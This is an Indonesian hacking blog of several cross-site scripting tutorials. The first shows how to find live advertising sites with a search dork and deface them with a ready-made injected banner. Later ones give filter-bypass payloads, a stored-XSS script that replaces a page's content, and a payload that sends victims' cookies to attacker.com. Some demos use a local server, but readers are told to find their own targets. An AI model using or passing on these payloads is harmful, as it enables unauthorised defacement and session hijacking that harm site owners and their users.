No Light

Kali ini saya akan membagikan tutorial untuk mendeface website iklan dengan metode XSS. Metode XSS ini boleh disebut dengan metode JSO. Metode ini sangat lah mudah, untuk kode defacenya juga sudah saya siapkan tinggal pakai saja.


Pertama-tama kita cari targetnya terlebih dahulu. Gunakan dork beriku, untuk dork dapat kalian kembangkan sendiri.

intext: "copyright © 2012 PermataIklan.com All Right Reserved"

Buka targetnya, setelah itu klik "Pasang Iklan".


Isi semua data-datanya untuk mengisi alaman website perlu diperhatikan.



Untuk injeksi XSS ke alamat web formatnya seperti ini :

nama.com">kodeXSS

Untuk full kode XSS kalian dapat gunakan dibawah ini :

zero.com"><div style="width:100%;height:100%;text-align:center;font-size:30pt;position:fixed;display:block;top:0;left:0;background:black;color:white;font-family:consolas,monospace;z-index:9999">YOUR WEBSITE HAS BEEN HACKED</div>

Terakhir klik "Pasang". Buka halaman utamanya dan BOOOM!!!. Perlu diperhatikan bahwa kalian tidak bisa terlalu banyak menggunakan Tag HTML, karena tampilannya akan rusak.


Semoga bermanfaat, Happy Hacking. "Deface adalah Seni Hacking".

Apakabar sahabat No Light ? Di tutorial ini akan saya bahas tentang kasus XSS yang pernah saya temui. Jadi setiap tag HTML yang saya masukan selalu di hapus. Tetapi pada kasus ini nilai dari parameter ter-reflected ke tag input. Di tutorial ini saya tidak mencontohkan pada website.


Untuk website yang mempunyai filter seperti ini sangat jarang sekali. Semisal url websitenya seperti ini :

URL : website-ru.sak/search?q=zerobyte

Jika kita melihat pada kode html nya nilai dari parameter "q" ter reflected pada tag input

<input type="text" name="p" value="zerobyte">

Kalau kita memasukan payload seperti pada tutorial berikutnya Mencuri Cookie dengan XSS. Maka tag HTML apapun akan di hapus atau tidak ditampilkan. Karena petik ganda tidak di filter, kita dapat memakai payload seperti dibawah ini :

Payload: " autofocus onfocus="javascript:alert(1)

Sehingga jika payload dimasukan ke kode HTML akan menjadi seperti ini :

<input type="text" name="p" value="" autofocus onfocus="javascript:alert(1)">

Atribut autofocus pada tag input akan membuat inputan tersebut focus ( seperti saat user klik/akan mengisi inputan tersebut ), karena atribut tersebut focus kita dapat memberikan kode javascript yang di handle oleh event onfocus, dimana ketika tag input dalam kondisi focus, kode javascript akan dijalankan.

Maaf jika tidak banyak yang bisa saya sampaikan, sampai jumpa pada tutorial berikutnya.

Apakabar sahabat No Light ? Di tutorial ini akan saya bahas tentang kasus XSS yang pernah saya temui. Jadi website yang saya test kerentanannya ini memiliki celah XSS yang mana parameter URL ter-reflected pada kode Javascript. Untuk tutorial ini saya akan mencoba pada website local.


Jika kita lihat pada tampilan websitenya tidak ada reflected apapun. Tetapi bila kita lihat melalui inspect element kita dapat melihat bahwa nilai dari parameter ter-reflected kedalamnya.


Karena ter-reflected kedalam sebuah string kita dapat mengexploitasinya dengan mudah. Ada 2 cara yang dapat dilakukan yang pastinya jika kondisinya berbeda.

1) Jika TAG html tidak terfilter termasuk tag script, kita dapat menggunakan payload

Payload: </script><script>alert(1)</script>

Ganti alert(1) dengan kode javascript kalian. Jika menggunakan payload diatas kita website akan menampikan dialog alert.

2) Jika TAG html difilter kita dapat menggunakan payload seperti ini, alert() akan memunculkan sebuah dialog dengan tulisan tertentu.

Payload: "-alert(1)-"

atau jika kalian ingin target langsung mengunjungi website tertentu, gunakan kode javascript location replace

Payload: "-window.location.replace("https://google.com")-"

Oke, itu saja untuk tutorial kali ini dan maaf jika tidak banyak yang bisa saya terangkan pada tutorial ini semoga bermanfaat dan sampai jumpa pada tutorial berikutnya.

Jika kalian sudah mempelajari tentang XSS, di tutorial kali ini saya akan menunjukan salah satu dampak yang dapat ditimbulkan dari serangan XSS yaitu Defacing. Deface yaitu mengubah tampilan dari sebuah website. Di tutorial ini saya akan menguji pada website local.


Di website ada sebuah kolom komentar, yang mana kita dapat memasukan nama dan sebuah komentar.


Untuk stored XSS, kode XSS akan disimpan didalam database. Jadi untuk stored XSS bersifat permanen, tidak seperti reflected XSS yang dapat terjadi jika user mengunjungi link yang ada payload XSS nya.

Jika kita memasukan payload dibawah ini pada kolom komentar kita akan mendapatkan kotak dialog alert. Siapapun yang mengunjungi link tersebut akan melihat sebuah kotak dialog.

Payload : <img src='x' onerror='alert(1)'>

Bagaimana jika payload nya seperti ini :

Payload : <script>document.documentElement.innerHTML = "<body style='background:black;color:white;'><h1>Your Website Has Been Hacked</h1></body>"</script>

*document.documentElement.innerHTML untuk mengubah kode HTML yang ditampilkan di website.

Hasilnya seperti ini, website sudah berhasil di deface dengan metode Stored XSS.


Tehniknya sangat sederhana namun dampaknya sangat besar. Segitu saja untuk tutorial kali ini semoga bermanfaat, silahkan bertanya di kolom komentar jika ada yang kurang dimengerti. Sampai jumpa pada tutorial berikutnya.

Cookie yang dibahas disini bukan kue. Cookie adalah sebuah informasi yang digunakan website untuk menyimpan informasi data pengguna. Data login tersebut difungsikan akan jika pengguna ingin membuka website tersebut tidak perlu login lagi.


Kita dapat mencuri cookie dari pengguna dengan menggunakan tehnik XSS atau Cross Site Scripting. Cross Site Scripting sama seperti SQLi yaitu berupa injeksi kode, tetapi untuk XSS menggunakan kode HTML dan Javascript. Kerentanan terhadap XSS terbanyak pada fitur pencarian yang ada di website.

Syarat :
1) Memahami HTML
2) Memahami Javascript

XSS sendiri terbagi menjadi 2 yaitu :
1) Reflected XSS, payload berada pada parameter url.
2) Stored XSS, payload disimpan di database.

Untuk contoh targetnya kalian bisa cari sendiri, saya menggunakan server lokal. Saya akan mencontohkan untuk men-eksploitasi pada fitur pencarian. Biasa ketika kita mencari sesuatu maka url akan berubah dan membawa parameter tertentu.


Dari gambar diatas dapat dilihat kalau nilai dari parameter "j" ( pada URL ) mempunyai nilai berita dan nilai tersebut ter-reflected ke dalam sebuah tag html dan kolom input. Kita masukan payload untuk mengecek kerentanan website.

Payload : "><img src=x>
URL : .../xss_1.php?j="><img src=x>

Jika website menampilkan gambar dengan icon rusak, berarti website tersebut rentan terhadap XSS. Setelah itu kita coba untuk menampilkan cookie user dengan fungsi javascript alert() dan document.cookie.


Payload : "><img src=x onerror="javascript:alert(document.cookie)">
URL : .../xss_1.php?j="><img src=x onerror="javascript:alert(document.cookie)">

Contoh cookie yang ditampilkan di website seperti ini :


Setelah itu kita buat payload untuk menyimpan cookie ( yang didapatkan ) ke website kita sendiri. Kita gunakan tag script untuk menjalankan kode javascript dengan mudah.

Payload : "><script>window.location='http://attacker.com%3fparam='%2bencodeURI( document.cookie )</script>

Ganti website attacker dan parameternya dengan kepunyaan kalian sendiri. Kalau url-nya dikunjungi, akan langsung dialihkan ke halaman attacker.


Oke, segitu saja untuk kali ini. Untuk yang stored XSS secara tehnik sama saja. Tulis dikolom komentar jika kalian belum paham dan sampai jumpa pada tutorial berikutnya.